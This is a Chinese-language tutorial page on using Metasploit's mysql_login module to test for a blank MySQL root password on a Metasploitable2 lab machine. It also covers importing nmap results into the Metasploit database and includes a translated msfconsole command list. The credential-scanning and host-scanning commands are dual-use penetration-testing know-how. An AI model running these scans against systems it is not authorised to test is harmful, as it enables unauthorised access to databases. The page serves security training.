IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码 -> 正文阅读

[网络协议]网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码

实战-使用msf扫描靶机上mysql服务的空密码

我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180
在这里插入图片描述
登录Metasploitable2-Linux系统用户名root,密码:123456
输入ip a 查看ip地址

在这里插入图片描述
登录Kali开始搜索模块

msf6> search mysql_login

在这里插入图片描述
加载模块

msf6 > use auxiliary/scanner/mysql/mysql_login

查看模块配置项

msf6 auxiliary(scanner/mysql/mysql_login) > show options

在这里插入图片描述
我们配置要爆破的用户

msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root

参数:BLANK_PASSWORDS 含意:Try blank passwords for all users #为所有用户尝试空密码 。 blank [bl??k] 空白的

开启为所有用户尝试空密码

msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true

设置目标主机

msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.180

在这里插入图片描述
配置完成以后我们执行run 或者exploit

msf6 auxiliary(scanner/mysql/mysql_login) > exploit

在这里插入图片描述
执行成功

使用后端凭证命令creds , 列出数据库中的所有凭据

Credentials   [kr??den?lz]  凭证;证书;
msf6 auxiliary(scanner/mysql/mysql_login) > creds

在这里插入图片描述
以下有视频版还有文字版

不知道怎么操作的请看文字版的,里面详细的步骤。

关注公众号侠盗男爵回复【kali系统】

视频版↓:

网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通!_哔哩哔哩_bilibili

文字版↓:

年底了号主把我自己用到所有技术“做过的实战项目-内网实战靶场环境-渗透工具”还有很多渗透思维图谱!

将扫描的结果导出Metasploit与导入另一台机器的Metasploit中

数据库后端命令:

db_connect   连接到现有的数据库
db_disconnect   断开与当前数据库实例的连接
db_export   导出包含数据库内容的文件
db_import   导入扫描结果文件(文件类型将被自动检测)

例1:将前面扫描mysql数据库空密码信息导出

msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /root/bak.xml

注:导出只支持两种格式:xml和pwdump
常用的导出格式为 xml
在这里插入图片描述
导出以后退出程序

msf6 auxiliary(scanner/mysql/mysql_login) > exit

例2:将扫描的结果导入另一台机器的Metasploit中
我们就不再开一台新Kali,直接重置数据库,当成新的来用

┌──(root💀xuegod53)-[~]
└─# msfdb reinit      

连接Metasploit

└─# msfconsole
msf6 > hosts

在这里插入图片描述
数据库中主机信息是空的,我们导入数据

msf6 > db_import /root/bak.xml

在这里插入图片描述

msf6 > hosts

在这里插入图片描述
hosts命令有多个选项,通过 hosts -h 可以查看

msf6 > hosts -h

在这里插入图片描述
在这里,最重要的是选项 -c,此选项使我们能够选择要用hosts命令显示的数据的列或字段(类似于SQL中的select命令)。在上图中可以看到显示的可用列。
例:显示指定列的主机信息

msf6 > hosts -c address,name,os_name

在这里插入图片描述
删除指定主机

msf6 > hosts -d 192.168.1.180

在这里插入图片描述
除此之外我们还可以直接将NMAP的扫描结果导入到Metasploit数据库中我们新开一个终端窗口来进行扫描。

└─# nmap -A xuegod.cn -oX xuegod.xml 
-oX  将扫描信息导出到XML文件中

在这里插入图片描述
我们回到Metasploit导入扫描结果

msf6 > db_import /root/xuegod.xml

在这里插入图片描述

msf5 > hosts

在这里插入图片描述
查看我们数据库中的主机都开放了哪些服务

msf5 > services

在这里插入图片描述
显示指定主机的服务信息

msf5 > services  -R 101.200.128.35 

在这里插入图片描述
扩展:
在msf命令提示符下输入help后,显示的命令列表和作用描述。
msf6 > help

核心命令

?   帮助菜单
banner   显示一个metasploit横幅
cd   更改当前的工作目录
color   切换颜色
connect   连接与主机通信
exit   退出控制台
get   获取特定于上下文的变量的值
getg   获取全局变量的值
grep grep另一个命令的输出  如: grep creds help
help   帮助菜单
history   显示命令历史
irb   进入irb脚本模式
load   加载一个框架插件
quit   退出控制台
route   通过会话路由流量
save   保存活动的数据存储
sessions    转储会话列表并显示有关会话的信息
set   将特定于上下文的变量设置为一个值
setg   将全局变量设置为一个值
sleep   在指定的秒数内不做任何事情
spool   将控制台输出写入文件以及屏幕
threads   线程查看和操作后台线程
unload   卸载框架插件
unset   取消设置一个或多个特定于上下文的变量
unsetg   取消设置一个或多个全局变量
version   显示框架和控制台库版本号

模块命令

advanced   显示一个或多个模块的高级选项
back   从当前上下文返回
edit   使用首选编辑器编辑当前模块
info   显示有关一个或多个模块的信息
loadpath   路径从路径搜索并加载模块
options   显示全局选项或一个或多个模块
popm   将最新的模块从堆栈中弹出并使其处于活动状态
previous   将之前加载的模块设置为当前模块
pushm   将活动或模块列表推入模块堆栈
reload_all   从所有定义的模块路径重新加载所有模块
search   搜索模块名称和描述
show   显示给定类型的模块或所有模块
use   按名称选择模块

工作命令

handler   作为作业启动负载处理程序
jobs   显示和管理作业
kill   杀死一个工作
rename_job   重命名作业

资源脚本命令

makerc   保存从开始到文件输入的命令
resource   运行存储在文件中的命令

数据库后端命令

db_connect   连接到现有的数据库
db_disconnect   断开与当前数据库实例的连接
db_export   导出包含数据库内容的文件
db_import   导入扫描结果文件(文件类型将被自动检测)
db_nmap   执行nmap并自动记录输出
db_rebuild_cache   重建数据库存储的模块高速缓存
db_status   显示当前的数据库状态
hosts   列出数据库中的所有主机
loot   列出数据库中的所有战利品
notes   列出数据库中的所有笔记
services   列出数据库中的所有服务
vulns   列出数据库中的所有漏洞
workspace   在数据库工作区之间切换
creds   列出数据库中的所有凭据

需要配套视频的小伙伴可以滴滴我!

在这里插入图片描述

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-03-08 22:56:03  更:2022-03-08 22:58:15 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 7:46:01-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码